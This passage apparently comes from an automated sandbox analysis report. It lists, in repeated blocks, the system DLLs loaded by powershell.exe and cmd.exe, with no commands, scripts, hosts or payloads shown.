                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
